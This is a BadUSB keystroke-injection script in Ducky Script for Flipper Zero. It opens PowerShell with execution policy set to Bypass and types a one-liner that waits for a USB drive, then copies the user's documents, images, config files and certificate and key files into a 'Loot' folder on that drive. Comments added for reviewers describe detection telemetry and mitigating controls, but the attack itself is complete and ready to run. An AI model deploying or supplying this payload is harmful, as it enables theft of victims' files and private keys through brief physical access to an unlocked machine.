BadUSB-Files-For-FlipperZero/OSINT/Exfiltrate Files to USB Drive.txt


REM Title: Exfiltrate files to Removable Drive
REM Author: @beigeworm
REM Description: Waits for a new USB Storage device to be connected and then copies many user files to that USB drive
REM Target: Windows 10 and 11
REM 1. Run this script.
REM 2. Connect your USB drive
REM
REM Reviewer notes (what this payload does, and what it leaves behind):
REM - It is keystroke injection: every step below is typed into the logged-on
REM   user's session, so it runs with that user's rights and needs an unlocked desktop.
REM - Nothing is hidden: the console stays visible and prints progress via Write-Host.
REM - Telemetry that records this activity: process creation with command line
REM   (Security 4688 with command-line auditing, or Sysmon event 1) shows
REM   powershell.exe started from the Run dialog (parent explorer.exe) with
REM   "-NoP -Exec Bypass"; PowerShell script block logging (event 4104) records
REM   the one-liner; the "Audit Removable Storage" policy logs the writes (4663).
REM - Controls that limit it: locking unattended sessions, device-control policy
REM   for new HID keyboards and for writes to removable storage, and application
REM   control (execution policy is not a security boundary, so "Bypass" is expected to work).
REM
REM Setup for Ducky Script: pause 100 ms after every command that follows.
DEFAULT_DELAY 100
REM Win+R opens the Run dialog; the fixed delay gives it time to appear.
GUI r
DELAY 750
REM Starts an interactive PowerShell with no profile and execution policy set to Bypass.
STRING powershell -NoP -Exec Bypass
ENTER
REM Fixed 4 s wait, presumably so the console is ready before the next line is typed.
DELAY 4000
REM The single typed line below does the following, in order:
REM  1. Counts removable volumes (Win32_LogicalDisk, DriveType 2) and polls once
REM     per second until that count differs from the starting count.
REM  2. Takes the first removable volume after a descending sort as the destination.
REM  3. Creates <drive>\<COMPUTERNAME>_Loot on it if the folder does not exist.
REM  4. Recursively searches Documents, Desktop, Downloads, OneDrive, Pictures and
REM     Videos under the user profile for the listed extensions, which include
REM     *.cer and *.key as well as documents, images, logs and config files.
REM  5. Copies each match into the single destination folder by file name only
REM     (source paths are not preserved), then exits the PowerShell session.
STRING $removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };$count = $removableDrives.count;Write-Host "Connect a USB Drive.";While ($count -eq $removableDrives.count){$removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };sleep 1};$drive = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | Sort-Object -Descending | Select-Object -First 1;$driveLetter = $drive.DeviceID;Write-Host "Loot Drive Set To : $driveLetter/";$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft");$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos");$destinationPath = "$driveLetter\$env:COMPUTERNAME`_Loot";if (-not(Test-Path -Path $destinationPath)) {New-Item -ItemType Directory -Path $destinationPath -Force;Write-Host "New Folder Created : $destinationPath"}foreach ($folder in $foldersToSearch) {Write-Host "Searching in $folder";foreach ($extension in $fileExtensions) {$files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File;foreach ($file in $files) {$destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name;Write-Host "Copying $($file.FullName) to $($destinationFile)";Copy-Item -Path $file.FullName -Destination $destinationFile -Force}}}Write-Host "File Exfiltration complete.";exit
ENTER